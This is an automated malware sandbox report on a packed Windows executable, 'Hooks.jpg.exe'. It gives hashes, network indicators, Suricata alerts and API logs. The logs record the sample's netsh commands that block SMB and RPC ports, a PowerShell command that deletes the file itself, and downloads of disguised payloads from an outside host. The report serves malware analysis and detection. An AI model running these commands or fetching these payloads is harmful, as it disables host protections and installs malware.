Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	July 1, 2024, 11 a.m.	July 1, 2024, 11:02 a.m.

Size	11.7MB
Type	PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
MD5	`422f3763021f8f9bfc31a9a7e4b049f9`
SHA256	`a1871f4f0149065abab263411d6afdd8ae962060db732e740e956898b62cee0b`
CRC32	`3CF322F7`
ssdeep	`196608:uBF+gGI892vAQENcXbc7zdgZpbHgCDoZ86F8l/SflHdINv2/sD/afUAbKs8hC3+q:uBvtlEhdwlHgCDoC6F8lYGJgspAbKs88`
Yara	PE_Header_Zero - PE File Signature IsPE32 - (no description) Generic_Malware_Zero - Generic Malware

Hooks.jpg.exe "C:\Users\test22\AppData\Local\Temp\Hooks.jpg.exe"
3052
- netsh.exe netsh ipsec static add policy name=Block
  2208
- netsh.exe netsh ipsec static add filterlist name=Filter1
  292
- netsh.exe netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP
  284
- netsh.exe netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=UDP
  664
- netsh.exe netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP
  1716
- netsh.exe netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=UDP
  2544
- netsh.exe netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP
  3036
- netsh.exe netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=UDP
  2336
- netsh.exe netsh ipsec static add filteraction name=FilteraAtion1 action=block
  2116
- netsh.exe netsh ipsec static add rule name=Rule1 policy=Block filterlist=Filter1 filteraction=FilteraAtion1
  260
- netsh.exe netsh ipsec static set policy name=Block assign=y
  2804
- powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Sleep -s 2;del "C:\Users\test22\AppData\Local\Temp\Hooks.jpg.exe"
  1116

Name	Response	Post-Analysis Lookup
www.362-com.com	A 1.226.84.135	1.226.84.135
152.134.208.175.in-addr.arpa
www.4i7i.com	A 1.226.84.135	1.226.84.135
api6.my-ip.io
download.microsoft.com	A 23.45.52.224 CNAME download.microsoft.com.edgekey.net CNAME dlc-shim.trafficmanager.net CNAME e12671.dscd.akamaiedge.net CNAME main.dl.ms.akadns.net	23.207.40.161
down.ftp21.cc	A 119.203.212.165	119.203.212.165
ipv6-api.iproyal.com
gtxvdqvuweqs.com	A 16.162.201.176	16.162.201.176
worldtimeapi.org	A 213.188.196.246	213.188.196.246
api.iproyal.com	A 93.189.62.83 A 193.228.196.69	193.228.196.69

IP Address	Status	Action
1.226.84.135	Active	Moloch
119.203.212.165	Active	Moloch
16.162.201.176	Active	Moloch
164.124.101.2	Active	Moloch
193.228.196.69	Active	Moloch
213.188.196.246	Active	Moloch
23.45.52.224	Active	Moloch
43.198.152.240	Active	Moloch
51.161.196.188	Active	Moloch
93.189.62.83	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
UDP 192.168.56.102:51405 -> 164.124.101.2:53	2027758	ET DNS Query for .cc TLD	Potentially Bad Traffic
TCP 119.203.212.165:80 -> 192.168.56.102:49174	2026537	ET HUNTING Suspicious EXE Download Content-Type image/jpeg	Potential Corporate Privacy Violation
TCP 192.168.56.102:49191 -> 51.161.196.188:443	2038968	ET INFO SSH-2.0-Go version string Observed in Network Traffic	Misc activity
UDP 192.168.56.102:50014 -> 164.124.101.2:53	2034196	ET INFO External IP Lookup Domain DNS Lookup (my-ip .io)	Potentially Bad Traffic

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.102:49168 23.45.52.224:443	C=US, O=Microsoft Corporation, CN=Microsoft Azure RSA TLS Issuing CA 08	C=US, ST=WA, L=Redmond, O=Microsoft Corporation, CN=akamai.download.microsoft.com	2c:c1:3d:3d:70:5a:9a:56:25:7c:d3:41:93:bc:76:f2:78:8b:81:63
TLS 1.2 192.168.56.102:49176 93.189.62.83:443	C=US, O=Let's Encrypt, CN=E5	CN=api.iproyal.com	80:b8:bd:29:30:c8:ef:b5:55:c7:42:e5:cf:b8:4a:0e:ec:00:59:23
TLS 1.2 192.168.56.102:49194 193.228.196.69:443	C=US, O=Let's Encrypt, CN=E5	CN=api.iproyal.com	75:ce:fc:4e:72:d9:c8:06:65:40:3b:ca:5a:f6:97:bf:df:c3:e8:ae
TLS 1.3 192.168.56.102:49197 213.188.196.246:443	None	None	None
TLS 1.2 192.168.56.102:49188 93.189.62.83:443	C=US, O=Let's Encrypt, CN=E5	CN=api.iproyal.com	80:b8:bd:29:30:c8:ef:b5:55:c7:42:e5:cf:b8:4a:0e:ec:00:59:23
TLS 1.2 192.168.56.102:49192 93.189.62.83:443	C=US, O=Let's Encrypt, CN=E5	CN=api.iproyal.com	80:b8:bd:29:30:c8:ef:b5:55:c7:42:e5:cf:b8:4a:0e:ec:00:59:23

Queries for the computername (6 events)

Time & API	Arguments	Status	Return
GetComputerNameW July 1, 2024, 11 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 1, 2024, 11 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 1, 2024, 11 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 1, 2024, 11 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA July 1, 2024, 11 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 1, 2024, 11 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent July 1, 2024, 11 a.m.			0	0

Uses Windows APIs to generate a cryptographic key (42 events)

Time & API	Arguments	Status	Return
CryptExportKey July 1, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003058e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 1, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00305620 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 1, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00305620 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 1, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00305620 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 1, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00305220 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 1, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00305220 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 1, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00305220 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 1, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00305220 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 1, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00305220 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 1, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00305220 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 1, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00304d20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 1, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00304d20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 1, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00304d20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 1, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00305820 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 1, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00305820 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 1, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00305820 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 1, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003053e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 1, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00305820 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 1, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00305820 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 1, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00305820 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 1, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00305820 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 1, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00305820 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 1, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00305820 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 1, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00305820 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 1, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003056e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 1, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003056e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 1, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003056e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 1, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003056e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 1, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003056e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 1, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003056e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 1, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003056e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 1, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003056e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 1, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003056e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 1, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003056e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 1, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003056e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 1, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003056e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 1, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003056e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 1, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003056e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 1, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00304e60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 1, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00304e60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 1, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00304e60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 1, 2024, 11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00304e60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx July 1, 2024, 11 a.m.		1	1	0

The executable uses a known packer (1 event)

packer

UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

GET method with no useragent header, Connection to IP address

suspicious_request

GET http://43.198.152.240:8080/api/node/ip_validate

Performs some HTTP requests (4 events)

request	GET http://download.microsoft.com/download/E/4/1/E4173890-A24A-4936-9FC9-AF930FE3FA40/NDP461-KB3102436-x86-x64-AllOS-ENU.exe
request	GET http://down.ftp21.cc/64.jpg
request	GET http://down.ftp21.cc/Update.txt
request	GET http://43.198.152.240:8080/api/node/ip_validate

Allocates read-write-execute memory (usually to unpack itself) (50 out of 128 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory July 1, 2024, 11 a.m.	process_identifier: 1116 region_size: 262144 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x025c0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 1, 2024, 11 a.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x025c0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory July 1, 2024, 11 a.m.	process_identifier: 1116 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72c21000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 1, 2024, 11 a.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0263a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory July 1, 2024, 11 a.m.	process_identifier: 1116 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72c22000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 1, 2024, 11 a.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02632000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 1, 2024, 11 a.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02642000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 1, 2024, 11 a.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x025c1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 1, 2024, 11 a.m.	process_identifier: 1116 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x025c2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 1, 2024, 11 a.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0266a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 1, 2024, 11 a.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02643000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 1, 2024, 11 a.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02644000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 1, 2024, 11 a.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0267b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 1, 2024, 11 a.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02677000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 1, 2024, 11 a.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0263b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 1, 2024, 11 a.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02662000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 1, 2024, 11 a.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02675000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 1, 2024, 11 a.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02645000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 1, 2024, 11 a.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0266c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 1, 2024, 11 a.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029d0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 1, 2024, 11 a.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02646000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 1, 2024, 11 a.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0267c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 1, 2024, 11 a.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02663000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 1, 2024, 11 a.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02664000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 1, 2024, 11 a.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02665000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 1, 2024, 11 a.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02666000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 1, 2024, 11 a.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02667000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 1, 2024, 11 a.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02668000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 1, 2024, 11 a.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02669000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 1, 2024, 11 a.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 1, 2024, 11 a.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c11000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 1, 2024, 11 a.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c12000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 1, 2024, 11 a.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c13000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 1, 2024, 11 a.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c14000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 1, 2024, 11 a.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c15000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 1, 2024, 11 a.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c16000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 1, 2024, 11 a.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c17000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 1, 2024, 11 a.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c18000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 1, 2024, 11 a.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c19000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 1, 2024, 11 a.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c1a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 1, 2024, 11 a.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c1b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 1, 2024, 11 a.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c1c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 1, 2024, 11 a.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c1d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 1, 2024, 11 a.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c1e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 1, 2024, 11 a.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c1f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 1, 2024, 11 a.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 1, 2024, 11 a.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c21000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 1, 2024, 11 a.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c22000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 1, 2024, 11 a.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c23000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 1, 2024, 11 a.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c24000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Foreign language identified in PE resource (1 event)

name

RT_VERSION

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x017f305c

size

0x00000254

Creates executable files on the filesystem (1 event)

file	C:\Users\test22\AppData\Roaming\GraphicsPerfSvcs.dll

Creates a service (1 event)

Time & API	Arguments	Status	Return	Repeated
